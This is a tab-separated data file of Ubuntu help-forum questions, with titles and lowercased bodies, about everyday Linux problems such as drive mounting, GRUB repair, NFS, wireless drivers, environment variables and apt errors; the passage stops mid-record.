443585	how to mount a wd500 gb external drive on ubuntu 13.10 running on trial through pen drive	i have installed ubuntu 13.10 on my 16gb pen drive . i launched ubuntu by clicking 'try ' and not installing it on my laptop . i connected a newly purchased 500gb wd elements external drive . - it is not mounting . when i clicked on d disks ... it is showing me the drive but i did not get the play button to mount it . please help me with the solution . when i click the drive in disks it is showing : model wdc wd5000lmvw-11veds3 ( 01.01a01 ) size 500 gb ( 500,074,283,008 bytes ) partioning master boot record serial number wd-wxb1a63f3949 assessmment smart is not supported device /dev/sdc contents unallocated space
443590	how to bootstrap puppetmaster on lxc on ubuntu ?	installation of puppet master on ubuntu has always been a matter of luck and a lot of patience to me - there are many seemingly unrelated things to do which has to be done in the precise order , many combinations and changing behaviour of the software . so i set to write a bootstrapping script , which one day would be able to automate this task . i share it here in hope , that with help of you it will be a good starting point for many beginners . input : name of the lxc container ( puppetmaster ) name of the codebase of ubuntu ( i.e . whether it is precise , saucy or trusty ) mycodename . fully qualified domain name for the puppetmaster ( puppetmasterfqdn ) user used to operate the puppet on the machine ; he also is an owner of the /etc/puppet ( puppetuser ) location of the external git repository . it will be cloned into the lxc container . gitlocation location of the public ssh key used for login ( puppetauth ) static ip address of the container , preferably inside the lxc 's private network ( puppetip ) gateway for the lxc . it could be set automatically based on the default lxc configuration , but i am too lazy to write automation around it ( puppetgetewayip ) features : installs the lxc container support on the host installs the ubuntu 's template ( the codename can be customized ) installs the user 's ssh key on the machine installs puppetmaster with puppetdb support ( for stored configs ) sets fixed ip address . connects the external puppet git repository with the container the script is written in a spirit of puppet , i.e . it makes sure that certain properties of the system are set , skipping actions if they are set already . so it can be run as many times , as needed . as an added bonus it also adjusts the user 's name from the default 'ubuntu'
443593	disk image creation outputs zero sized cylinders	i use the following command to create a disk image dd if=/dev/zero of=/tmp/image.ext2 bs=1k count=100000 this is the odd observation , the output of fdisk -l image.ext2 this instruction on my ubuntu virtual machine outputs disk image.ext2 : 0 mb , 0 bytes 255 heads , 63 sectors/track , 0 cylinders units = cylinders of 16065 *512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 when i take the same image to another ubuntu linux machine ( not a vm ) the output is as follows : disk image.ext2 : 102 mb , 102400000 bytes 255 heads , 63 sectors/track , 12 cylinders , total 200000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 what could be wrong with my machine ?
443595	including pathnames	i am very new to linux . i have got installed ubuntu 12.04 a day before . i could install a number of needed things like python , numpy , scipy , matplotlib , pygtk etc . however when i tried to get installed atomic simulation environment on my system using command line prompt i received a message like this resolving download.openuse.org ( download.openuse.org ) ... failed : name or service not known so i quit that attempt and obtained the package as a tarball ; issued following commands $ cd $ home $ tar zxf python-ase-3.8.0.3420.tar.gz $ ln -s python-ase-3.8.0.3420 ase what they further ask to do is '' it is sufficient to put the directory $ home/ase in your pythonpath environment variable , and the directory $ home/ase/tools in your path environment variable . do this permanently in your ~/.bashrc file : '' what does this mean and how to get it done they have shown the commands for this as export pythonpath= $ home/ase : $ pythonpath export path= $ home/ase/tools : $ path why these commands do not start with $ my terminal always opens with $ at the beginning . can i issue these commands there ?
443596	installing ubuntu from bootable flash drive leads right back to installation menu	i am new to installing ubuntu , but i managed to install wubi before . this time i created a bootable usb stick to install ubuntu from , as explained here . i followed every step and used d : / as the usb flash drive . when i restarted my laptop , the ubuntu installation menu showed up , but i could n't select the option : try `` ubuntu '' or `` install ubuntu '' . when i hit enter , my machine just restarts and goes back to the ubuntu installation menu . please enlighten me .
443598	using unity as console command launcher	i wonder , is there any way to do this in ubuntu 's unity : press super button type gksu wireshark enjoy wireshark as root in other words : is there a way to execute shell command from unity line ?
443602	what commands show pending/scheduled tasks in terminal ?	what commands can i use in terminal to see pending or scheduled tasks for today or tomorrow . for example how can i detect pending system shutdown ?
443603	xp to ubuntu issues	i have an xp computer , and i am trying to setup a dual boot configuration with ubuntu . i copied the wubi.exe to a flashdrive and copied it into a separate partition . it took several hours to install , but everything seemed to be fine . however , i rebooted and nothing happened . as suggested on the website , i pressed f12 - but i did n't understand anything . does anyone have a suggestion ?
443604	root server - nothing works after ubuntu 10.04 update to 12.04	yesterday i tried to update my root server ( ubuntu 10.04 with plesk 11.5 ) with the accepted answer of this treath : ask ubuntu unfortunately i interrupted the putty process : ( and insert the same commands again . the precoess runs through ... in plesk the ubuntu version donâ´t change and my server runs fine . then i decided ( i dont know why ) to make a update with apt-get update apt-get upgrade everything works fine . then i changed my server memory in the php.ini file . everything works fine . afterwards i run this command with putty : reboot looks fine - but a few minutes later all my sites ( 4 domains ) dont work anymore . also the connection with putty is not possible ! i cant connect per ftp to my server or something else ... ? ? ? no way . i asked my server provider for help , but they have no technical person for the weekend and i should wait until monday . in my server backend from my server provider i can access a limited server panel where i can start , restart , stop ( regular ) , stop ( soft ) and stop ( hard ) my server . i tried to stop ( regular ) and start the server - no change i tried to restart the server - no change in this panel i also see the server status . it shows me `` running '' but under the configuration there is additional info like : '' no image included '' `` no baremetal tools '' distribution : `` ubuntu '' there is also a memory and cpu display - both shows 0 load any idea to help me out ?
443606	opl9 keys suddenly stopped working	all of a sudden the 9opl keys ( german qwertz layout ) on my ubuntu 14.04 laptop stopped working . i recently updated from 13.10 to 14.04 beta and the keyboard worked just fine . however , starting today , key presses of the aforementioned keys are n't recognised any more . a reboot does n't fix the problem and the keys also do n't work with windows . i have seen this happening on a macbook pro before with exactly the same keys . any hints on what could 've happened here ?
443608	why i can not use the fn + ( up ) to control the brightness ?	i have a lenovo zhaoyang k27 with intel速 hd graphics 3000 . since i installed ubuntu for the first time , about two years ago , i have n't been able to change the brightness by fn+^ . i found a solution in the following command : echo 1450 | sudo tee /sys/class/backlight/intel_backlight/brightness where 1450 is the brightness value . this is the only way i could find to change the brightness . to set the sound by the function keys ( fn+ < and fn+ > ) works well , only the brightness is the problem . how can i solve this issue ?
443613	why does nfs-kernel-server only pretend to stop ?	background : i had an nfs server , ran fine for years , needed to hard reboot it , and now i can not get the daemon to stop when it 's told to . also , clients ca n't mount it any more , but i suspect the problem is whatever is preventing the daemon from stopping . when i run : service nfs-kernel-server stop it says : * stopping nfs kernel daemon [ ok ] * unexporting directories for nfs kernel daemon ... [ ok ] then i run : service nfs-kernel-server status and it says : nfsd running so it does n't appear to be stopping the service . also , running stop multiple times does not produce an error- it just says it stopping nfs kernel daemon each time i run the stop command . when it is supposedly stopped , ps aux | grep nfsd shows : root 761 0.0 0.0 0 0 ? s < apr04 0:00 [ nfsd4 ] root 762 0.0 0.0 0 0 ? s < apr04 0:00 [ nfsd4_callbacks ] root 763 0.0 0.0 0 0 ? d apr04 0:00 [ nfsd ] root 764 0.0 0.0 0 0 ? d apr04 0:00 [ nfsd ] root 765 0.0 0.0 0 0 ? d apr04 0:00 [ nfsd ] root 766 0.0 0.0 0 0 ? d apr04 0:00 [ nfsd ] root 767 0.0 0.0 0 0 ? d apr04 0:00 [ nfsd ] root 768 0.0 0.0 0 0 ? d apr04 0:00 [ nfsd ] root 769 0.0 0.0 0 0 ? d apr04 0:00 [ nfsd ] so it appears that the stop command is n't actually stopping the daemon and processes . why ?
443617	my question is how can i install flash player without changing the admin password	i am using an ubuntu machine in my office . and i am logged in as a normal user.i dont have the admin password . i know how to change the password of the admin user . however , if i do that it will create a problem . so without affecting the old password i want to install the flash player . request to experts please help me .
443619	how to adjust the mouse scroll speed in lxde ?	note : i am not asking for xset m 5/1 etc . following problem : my mouse scroll speed is extremely slow in lxde , wich means i need to scroll like a maniac . any solutions for this problem ?
443622	ubuntu touch html5 app tab navigation not working	i am new in ubuntu touch app development , i am using html5 instead of qml . below is my code . < div data-role= '' mainview '' > < header data-role= '' header '' > < ul data-role= '' tabs '' > < li data-role= '' tabitem '' data-page= '' hello-page '' > hello world < /li > < li data-role= '' tabitem '' data-page= '' hello-next '' > hello next < /li > < /ul > < /header > < div data-role= '' content '' > < ! -- the application main page -- > < div data-role= '' page '' id= '' hello-page '' > roopal < /div > < div data-role= '' page '' id= '' hello-next '' > jain < /div > < /div > < /div > when i run this basic code from the sdk i get a top navigation element with 2 tabs and a main display below displaying the text : `` main '' . so far so good . now when i try to change the tab to `` another '' , the navigation animation runs , the tab switches in the title but nothing happens in the mainview area . also , the navigation appears to be dead after this . it no longer responds to any input at all . what am i doing wrong ?
443624	built-in sd card reader does n't work	may you help me ? my sd work perfectly ( i know because i checked in other pc and on my camera ) i do n't understand what i read here below xd root @ marco-laptop : ~ # mount /dev/sda1 on / type ext3 ( rw , relatime , errors=remount-ro ) proc on /proc type proc ( rw ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/marco/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=marco ) root @ marco-laptop : ~ # fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 testine , 63 settori/tracce , 14593 cilindri , totale 234441648 settori unită = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes identificativo disco : 0xec8f0fab dispositivo boot start end blocks id system /dev/sda1 * 63 228428234 114214086 83 linux /dev/sda2 228428235 234436544 3004155 5 esteso /dev/sda5 228428298 234436544 3004123+ 82 linux swap / solaris
443627	clickpad cursor jumps when using drag and drop ( synaptics )	i recently swiched from windows to linux ( again after buying a new laptop ) . after trying a few distros ( mint , opensuse ) i ended up with ubuntu . now my problem : on every distro i installed ( even on the live usb demos ) my cursor jumps when using ( one finger click the other one move ) drag and drop on my ( macbook style- ) clickpad . i already played a bit with the synaptics config file but did n't get any good results . after analyzing the problem a bit i found out that the cursor moves smoothly when i keep my second finger moving constantly , but after releading it the cursor jumps back about to the position where i initially started my drag and drop movement . another weird thing is that when i place the sceond finger on the clickpad ( while clicking with another one ) to start moving things it jumps in the angle of the fingers to each other . e.g . if i click on the bottom left corner and place the other finger right in the midde it moves 45 degrees up right . if there is more more space between the fingers it jumps a greater distance . i 'd really apreciate any help with this since it is very irritating .
443629	read/write excel files using java in linux environment ( query based )	1 ) can any one share a example program which reads/writes the excel files query based ... 2 ) what steps required to run in linux environment , using an excel driver ( preferably some kind of odbc-jdbc bridge ) pls do needful ...
443631	environment variables and .bashrc	i need help in this : that is how to do this edit the setting file of the user . in our case it should be in the root directory of the user and the name is .bashrc or .bash_profile 2.- add the environment variable fullprof , that has as value the absolute path of the directory in which we have installed the programs of the fullprof suite . for instance : fullprof=/opt/fullprof_suite fullprof=/usr/local/bin/fullprof_suite 3.- add the above directory to the path variable path= $ fullprof : $ path 4.- export the defined variable export fullprof 5.- the changes will be effective on opening a new terminal window . to verify that everything is ok , just type in your terminal the command : - > echo $ fullprof the system will show the directory in which you have installed the programs .
443637	how to remove grub without access to windows	i have been dual booting windows 8.1 and ubuntu 13.10 on my surface pro 2 . but as the drivers on ubuntu are n't that great for the surface , i decided to remove ubuntu . however they way i removed ubuntu was to delete the partition from windows and then expand the windows partition to use all the storage . when i restarted the computer it booted straight into a grub console ( minimal bash-like ) grub > the problem is now i want to boot windows 8 as that 's the only operating system on the device right now . how can i do that ? i have successfully booted a ubuntu live usb from that menu . i did that because i wanted to run boot-repair or lilo from within the live environment to be able to remove grub and get the mbr back . however none of that worked . i now feel a little stock , and i 'm out of ideas on what to do next . can i reinstall grub somehow so i can boot windows ? ps i do n't think i can boot a windows recovery media as i 'm not able to get anywhere else but to this grub menu . that means , no bios/efi menus are accessible . i ca n't resize the windows partition from ubuntu as it keeps saying something about windows is in hibernate mode , and therefore the partition can only be mounted as read only.. the screen i see when i boot looks like this :
443639	php 5.4 on vps with ubuntu 11.10 oneiric oncelot	ні , everyone ! on my vps is installed ubuntu 11.10 and i ca n't update it to 12.04 or any other . in ubuntu 11.10 repositories are php 5.3.6 , apache 2.2.20 and mysql 5.1 . in ppa : ondrej/php5 or ppa : ondrej/php5-oldstable oneric does n't supported . but i need php > =5.3.7 for laravel framework . can anyone help me , please ?
443641	wireless issue on lenovo thinkpad l540	i recently installed ubuntu 13.10 on my lenovo thinkpad l540 . it has problem with the wifi connection . when just booted it works then suddenly it drops the connection and can not even see the wifi networks . i tried to install the windows driver for the wireless card intel 7260 but i 'm not able to extract the .inf file from the .exe that i download from intel website . with the .inf file i should then be able to install the driver using ndiswrapper but , since i can not get the .inf file , this way is gone . i tried also following other ways . i upgraded the kernel to the 3.13 from 3.11 but still it does n't work . i tried also to follow instructions such as those from intel wireless 7260 driver crashes , how do i work around it ? but every time i give the command sudo modprobe -r iwlwifi i get : fatal : module iwlwifi is in use . 6-april-edit : the command sudo modprobe -rf iwlmvm before sudo modprobe -r iwlwifi , does n't change the situationi . still the output to the second command is fatal : module iwlwifi is in use . the output to uname -r is 3.13.1-031301-generic the output to dmesg | grep iwl is a long list made of elements like the following [ 2028.111303 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s plus some few exception lines which give [ 2031.232825 ] iwlwifi 0000:02:00.0 : rf_kill bit toggled to enable radio .
443642	how to install driver for middle button clickpad scrolling	i want to use this as this : specifically , i 'm trying to enable scroll wheel emulation using the trackpoint when the middle button 2 of the clickpad is pressed . i 've examined the xev output when a trackpoint is used for scrolling with dedicated buttons ( button 4 is recognised as a scroll up operation and button 5 is recognised as a scroll down operation ) but the behaviour is different when using the clickpad buttons ( button 2 is recognised in isolation ) . it appears that a modified driver is needed in order to enable scrolling using the middle button of the clickpad . such a driver appears to be available here : https : //aur.archlinux.org/packages/xf86-input-evdev-trackpoint/ how could this driver be installed in ubuntu ?
443644	lenovo y580 , windows 7 and ubuntu ( i hope so ... )	i love ubuntu so i wanted to have one on my laptop . i have lenovo y580 with core i3-3310m version . i have windows 7 ( for my work , unfortunetly ) but i also wanted to have ubuntu . my first attempt to go for it was about 6 months ago and i completly lost all my data , because of hell knows what . so now , i want to ask you to help me with installing it . i have a 13.10 version on dvd disc and i start to install it . when it comes to option to check a other os , it just do n't see windows 7 . how can i install ubuntu next to windows when it does not see it ? and other question - installer sees some wierd partitions from god knows where . in windows there are c : ( ~100gb0 ) , d : ( ~400gb ) , e : ( ~420gb ) , unallocated ( ~70gb for ubuntu ) and here in ubuntu are only two of them , one ~800gb and the rest is the one that i 've created for it ~70gb ) . any ideas what the hell is goin ' on ?
443645	starting bash from /usr/bin/env or /bin	which would be advised as the first line in a bash script : # ! /usr/bin/env bash or # ! /bin/bash
443648	how to install mod security on apache 2.49 ?	i have watched many tutorial about how to install mod security on apache but alway have problem & its look like there is no package for this libapache2-modsecurity : depends : apache2.2-common but it is not going to be installed e : unable to correct problems , you have held broken packages . i use : apache/2.4.9 ( ubuntu ) php 5.5.10-1+deb.sury.org~precise+1 ( im oblige to use 5.5.10 for my script ) i have found many package for apache 2.2 but not for my version do you know more about this please ? wich library i should install/compil ? im bit lost thx you very much
443656	create a file and write to it	trying to create a file auto.home under /etc and write this to the file : 192.168.56.101 : /nfs/home/ & i am not doing it with commandline , but bash script . tried this but didnt work : cat 192.168.56.101 : /nfs/home/ & > /etc/auto.home
443658	change permissions of a folder in ubuntu	i created a shared folder in ubuntu which is located in virtualbox . when i open that folder i am getting this error line : you do not have the permissions necessary to view the contents of `` sf_ubuntu ''
443663	problem to start ssh automatic	my ubuntu 12.10 do n't start ssh automatic when i boot it . so when i use this after i restart my system appear booting system without full network configuration and i ca n't use ssh for external clients . i want to use a openvpn . but how can i resolve this problem ?
443665	grub rescue mode , `` error file /boot /grub/i386-pc/norma.mod not found ''	i have an hp laptop envy m6 , with 8 gb of ram and a 750 gb hdd . it came with windows 8 pre-installed and i installed ubuntu 13.04 . it worked fine but after upgrading ubuntu to 13.10 my laptop fails to boot showing this error : error : file /boot/grub/i386-pc/normal.mod not found entering rescue mode grub rescue > i tried to fix this error with bootrepair without any luck . i got this bootinfo . help me please fixing this problem , i have struggled consecutively for four days . note : in my bios settings i have disabled secure boot , but legacy support is enabled .
443666	no display with ubuntu 13.10 server after intsalling ubuntu-desktop	very first when i bought the system installed xubuntu . it worked good along with everything but had to give up due to battery backup issues . then i installed ubuntu 13.10 serve . on top of that i also installed ubuntu-desktop . but , the desktop does not show up . i have tried startx with lightdm stopped and vice versa . also with both running . nothing shows up . this is a amd64 system with dual graphics card ( 1gb integrated and 1.5 external ) . also i have disabled secure boot . and running win8.1 with dual-boot option .
443669	how update exiftool in 13.10 lubuntu	i have lubuntu 13.10 and exiftool 9.13 . how can i update exiftool to version 9.55 ? i downloaded the newest exiftool from www and do everything to install it according to : http : //owl.phy.queensu.ca/~phil/exiftool/install.html # unix everything went fine , but synaptic still says that i have 9.13 and of course it still work like the older one app , it didnt update ! in repository the newest ver is 9.13 what is not true . simply i am not linux guru , just user and want to have exiftool with kml support to geotag my poics and new ver of exiftool do that but i dont know how to update my lubuntu to use it .
443671	ca n't install ubuntu 10.04 with 12.04 already installed	i have a machine with ubuntu 12.04 lts desktop installed and everything works find . i would like to install 10.04 lts on a second partition . i tried booting from a 10.04 dvd through the bios . when the 10.04 disk is in the drive , it is not listed as a bootable device . only my linux partition is listed as bootable drive . the dvd drive is listed as a bootable device with other distributions such as 13.04 and 13.10 . my kernel version is ubuntu 3.11.0-19.33~precise-generic 3.11.10.5 . my grub version is 1.99-21buntun3.14 .
443673	gparted - resizing boot partition	i want to install windows 7 on a computer which has ubuntu 13.10 . when ubuntu was installed on this computer , its boot partition received all available hard disk space ( except for the part given to swap ) . now , whenever i am trying to shrink the area occupied by boot , gparted blocks most of the menu options ( including resizing ) . so , why ca n't i resize boot ? also , is there a tutorial about working with gparted from tty or pts ? ( everything i found so far uses the gui menus exclusively , which may get very frustrating after a while ) . i 've tried using a live cd ( by burning the downloaded ubuntu iso on a dvd ) , so i 've changed rom to boot from odd as the first option , but the live cd still does n't show up , and ubuntu boots as usual ( this part was more like a secondary point ) .
443678	ld_library_path	i have tried to link vincia to root , but there is a problem related to the location of the shared libraries in my system . since i have installed all these tools in a directory which is different than /usr/local/lib/ the makefile did n't know the location of these libraries . i have tried to set it manually by this command : export ld_library_path=/usr/local/lib but it does n't work . could you please help to fix this problem ?
443679	intel if56a-cl modem drivers	complete linux noob . i 'm looking for some linux drivers to this modem : intel if56a-cl . i have a zip of the windows xp drivers if that helps . the problem is as the pc is so old the only ethernet ports are on this pci card ... any ideas on what i can do ?
443681	libssl1.0.0 throwing errors	whenever i try to do any package manipulation - stuff like apt-get install or apt-get update , etc . - i keep getting errors related to libssl1.0.0 . i 've tried various things online to no avail . sudo dpkg -- configure -a returns the following : errors were encountered while processing : libssl1.0.0 libssl1.0.0 : i386 i 'm relatively new to linux , and i am running 12.04 . does anybody have potential solutions ? output of sudo dpkg -- configure -a : http : //pastebin.com/ckzmq7sg output of sudo apt-get install -f : http : //pastebin.com/ya35qcbz output of apt-cache show libssl1.0.0 : i386 | head -2 : w : unable to locate package libssl1.0.0 : i386 e : no packages found
443684	which ubuntu version for dell precision m4400 notebook	i would like to install ubuntu on my old dell precision m4400 notebook , but i am not sure on the right version to use . specs : intel 2.53 ghz processor 2 gb ram nvidia quadro fx 770m , 512mb graphics card . any advice is appreciated .
443686	live dvd ignored when booting	i want to resize the / partition of a computer , and for this i need to use a live disk . i 've downloaded the ubuntu-13.10-desktop-amd64.iso file from the ubuntu website , and i burned it onto a regular dvd . then , i 've reordered the boot priority from bios such that it tries to boot from the dvd drive first and i 've saved the new order ( i 'm almost sure there is no error within this step ) . however , whenever i boot , bios seems to ignore the live dvd and starts ubuntu regularly . do you spot any error in my actions which prevents me from using the live disk ?
443695	how to solve the problems in `` sudo apt-get update ''	here is my /etc/apt/source.list file . i get many problems in the output of sudo apt-get update : $ sudo apt-get update [ sudo ] password for tim : err http : //cran.cnr.berkeley.edu precise/ release.gpg could not connect to cran.cnr.berkeley.edu:80 ( 169.229.201.201 ) . - connect ( 111 : connection refused ) err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found w : failed to fetch http : //cran.cnr.berkeley.edu/bin/linux/ubuntu/precise/release.gpg could not connect to cran.cnr.berkeley.edu:80 ( 169.229.201.201 ) . - connect ( 111 : connection refused ) w : failed to fetch http : //ppa.launchpad.net/venerix/blug/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/venerix/blug/ubuntu/dists/precise/main/binary-i386/packages 404 not found w : some index files failed to download . they have been ignored , or old ones used instead . i have several errors at the end of the output . how can i solve the problems ? thanks !
443696	update dell bios from ubuntu	i would like to know how i can update my laptop bios from ubuntu i have laptop e6430 i see dell released a version for windows only so is there a way to do it from ubuntu
443701	want to copy a file from windows partition to ubuntu homefolder	upgraded my ubuntu 12.04 to 12.10 ... now at booting time , a black screen is coming . so i downloaded nvidia driver and save it in windows partiton f : / how can i copy in to my ubuntu home folder using commands ... please help me..
443702	help needed on installation of ubuntu server ( precise pagolin )	when the installation of the base system of ubuntu server has reached 80 % , it tells me to insert a disc called `` ubuntu server 12.04.4 lts precise pangolin-release i386 ( 20140204 ) '' in /media/ cdrom/ what should i do ? thanks in advance .
443706	configure juju on rackspace	i want to deploy a successfull juju env on rackspace infrastructure , i follow all the steps in the official doc , i google but nothing reveal . there is any other step or configuration i miss ?
443708	i have lubuntu software center instead of ubuntu software center	some how my ubuntu 14.04 has lubuntu software center and i do not have ubuntu software center ? i want it to be normal . how do i delete lubuntu software center and install the normal software center ? thank you
443711	ubuntu 12.04.4.4 installation from cd onto dell dimension 4100desktop pc	installation stops at 'configuring hardware ' when installing 12.04.4.4 from cd onto dell dimension 4100 desktop
443712	got disconnected from internet after installing and purging vpn oneclick	i have tried to install vpn oneclick on ubuntu 12.04.3 lts to access blocked websites but it did not seem to work as intended and i purged it via apt-get . now i can not connect to the internet on ubuntu and i am writing this text on windows . how can i resume my settings and internet connection ? any help is greatly appreciated . thanks
443713	i need help with networks being duplicated ?	i 'm on ubuntu 12.04 . let me start by saying i 'm a newbie . anyway when i start ubnutu and login i get the empty wireless symbol . i then click it and try my network ssid 's name . i get : authentication required and then i proceed to enter my password but even though it 's been entered before it thinks that my password is wep 40/128-bit key instead of wpa & wpa2 personal . i then go into network manager - > wireless , and find that it has made duplicates : i can then click on the duplicates edit them and type in my password . i can then connect to the network until i reboot or the network crashes ( i do n't know if this links in but my network crashes whilst streaming or playing minecraft ) i am using 'netgear wn111v2 ' wireless adapter ( i did n't need any drivers it worked staright away ) and my modem is a virgin media super hub . any help at all would be appreciated ! thanks
443716	3 bugs after starting marionnet 0.90.6 and cant add machine in new project	i need to make simple project in marionnet- virtual network . i have no experience with marionnet and minimal experience with ubuntu/linux . after installing and starting marionnet there are 3 errors : unsatisfied dependency : you do n't have a default uml kernel for virtual computers continuing anyway , but some important features will be missing . you do n't have a default filesystem for virtual routers continuing anyway , but some important features will be missing . you do n't have a default filesystem for virtual computers continuing anyway , but some important features will be missing . marionet > project > new then marionnet crashes . after restart ubuntu same errors appears , but this time i can create new project and add every items ( hub , switch , cable ) except machine . could someone help me .
443717	install , no partition detected	i tried to install ubuntu 13.10 on my laptop . i 've 2 disc ( 1 ssd , 1 hdd ) . i tried to install ubuntu at the end of my hdd , because i did n't want to erase my data ( ubuntu did n't see any partition at this moment ... ) . i successfully installed ubuntu , but when i go back in windows , i ca n't see my other partition with my data ... i think it 's not lose but how can i fix tat issue ? thanks :
443720	i known the passpharse , but it says bad password when i type . please help my all 500gb data is encrypted !	i previously had windows 8 installed , i did n't take a backup of my data before installing ubuntu 13.10 and while installing ubuntu 13.10 , i checked both lvm and other encrypt something , had new installation after everything , ubuntu had welcomed with my passphase , then after a while i found my complete data lost . i did many reboots , still i did n't find any data on my hdd ( passpharse was working fine ) and after many research , with help of askubuntu.com i restored the data back on same encrypted 500gb hdd ( data restored was about 300gb ) it took almost 1hour to restore ! i was very happy that time . after complete restoration i restarted my pc , the passpharse was n't working !
443721	no network connection in ubuntu 12.04 lts	i installed 12.04 lts on a dell vostro 1000 notebook . network adapter is a broadcom 440x 10/100 integrated controller and a dell wireless 1390 wlan mini-card . but i can not get network access neither with lan cable nor with wireless . when i boot from usb stick and start the trial version from the stick , internet access is not a problem at all ! ! also with win xp it works perfectly . in the trial-version , ubuntu found some drivers for the broadcom card , which i installed ( still unsing trial-version ) . but when i start the installed version later , internet access again is not possible . thanks in advance !
443722	i had installed gnome as my environment but i did a shut down and reverted to kde and has removed the option to choose gnome	i was running a movie last night through hdmi on my lenovo g580 ( intel core i5-3230m @ 2.60ghz and 6 gig ram with intel hd4000 graphics . check online for full specs ) anyway , i had finished watching last night and shutdown my pc . the next morning i started it up and did n't provide me with the option of gnome desktop , just ubuntu and kde plasma workspace . i rely on gnome heavily . should i just re-install gnome .
443728	how do i install adobe flash for use with the chromium browser ( pepperflash ) ?	i am running ubuntu 13.10 and would like to use adobe flash in chromium ( or chrome ) . how can i do this ? if not possible , what linux software is available that will work with flash files ?
443730	evolution does n't work after installation	i just downloaded the evolution on my ubuntu 13.10 but after installation and correct configuration of the mail account , it is not working . it just appears on the launcher but does n't do anything . can anybody help me ?
443732	how can i broadcast a local video file as a webcam feed ?	i want to broadcast a local video file file.avi as if it were a webcam via a flash-based broadcasting system inside google chrome on a public website ( a-la ustream ) .
443734	how to configure nfs server to be accessible through firewall	i want my shared folder be accessible throught the nat . i should then create rules for ports . problem is that i do n't know which ports are used and needed for my nfs server to work , and netstat -lptu | grep nfs command does n't give me any port . any help ?
443736	booting only black screen with pista @ pista-desktop : ~ $	when bootin start first i see bios second i see `` ubuntu 12.04 '' . third i see black screen to come out with `` pista @ pista-desktop : ~ $ '' but it is dead frozen when i press ctrl+alt+f1 to access the terminal window i can not log in . when i am booting from cd it does not work i have the same result '' pista @ pista-desktop : ~ $ '' . i can get to recovery mode but i do not know what to do there ?
443740	how to solve this - failed to fetch http : size mismatch	i 'm trying to install mysql server in ubuntu 13.04 . but , i get the following warning warning : the following packages can not be authenticated ! libaio1 mysql-common libmysqlclient18 libnet-daemon-perl libplrpc-perl libdbi-perl libdbd-mysql-perl mysql-client-core-5.5 libterm-readkey-perl mysql-client-5.5 mysql-server-core-5.5 mysql-server-5.5 libhtml-template-perl mysql-client mysql-server install these packages without verification [ y/n ] ? if i give yes i get this - get:1 http : //in.archive.ubuntu.com/ubuntu/ raring/main libaio1 i386 0.3.109-3 [ 6,554 b ] get:2 http : //in.archive.ubuntu.com/ubuntu/ raring-updates/main mysql-common all 5.5.34-0ubuntu0.13.04.1 [ 13.3 kb ] get:3 http : //in.archive.ubuntu.com/ubuntu/ raring-updates/main libmysqlclient18 i386 5.5.34-0ubuntu0.13.04.1 [ 912 kb ] get:4 http : //in.archive.ubuntu.com/ubuntu/ raring/main libnet-daemon-perl all 0.48-1 [ 43.1 kb ] get:5 http : //in.archive.ubuntu.com/ubuntu/ raring/main libplrpc-perl all 0.2020-2 [ 36.0 kb ] get:6 http : //in.archive.ubuntu.com/ubuntu/ raring/main libdbi-perl i386 1.622-1 [ 854 kb ] get:7 http : //in.archive.ubuntu.com/ubuntu/ raring/main libdbd-mysql-perl i386 4.021-1 [ 98.1 kb ] get:8 http : //in.archive.ubuntu.com/ubuntu/ raring-updates/main mysql-client-core-5.5 i386 5.5.34-0ubuntu0.13.04.1 [ 1,850 kb ] get:9 http : //in.archive.ubuntu.com/ubuntu/ raring/main libterm-readkey-perl i386 2.30-4build4 [ 28.5 kb ] get:10 http : //in.archive.ubuntu.com/ubuntu/ raring-updates/main mysql-client-5.5 i386 5.5.34-0ubuntu0.13.04.1 [ 8,058 kb ] get:11 http : //in.archive.ubuntu.com/ubuntu/ raring-updates/main mysql-server-core-5.5 i386 5.5.34-0ubuntu0.13.04.1 [ 5,677 kb ] get:12 http : //in.archive.ubuntu.com/ubuntu/ raring-updates/main mysql-server-5.5 i386 5.5.34-0ubuntu0.13.04.1 [ 8,700 kb ] get:13 http : //in.archive.ubuntu.com/ubuntu/ raring/main libhtml-template-perl all 2.91-1 [ 65.1 kb ] get:14 http : //in.archive.ubuntu.com/ubuntu/ raring-updates/main mysql-client all 5.5.34-0ubuntu0.13.04.1 [ 11.4 kb ] get:15 http : //in.archive.ubuntu.com/ubuntu/ raring-updates/main mysql-server all 5.5.34-0ubuntu0.13.04.1 [ 11.5 kb ] fetched 26.0 kb in 0s ( 197 kb/s ) failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/liba/libaio/libaio1_0.3.109-3_i386.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-common_5.5.34-0ubuntu0.13.04.1_all.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/libmysqlclient18_5.5.34-0ubuntu0.13.04.1_i386.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libn/libnet-daemon-perl/libnet-daemon-perl_0.48-1_all.deb size 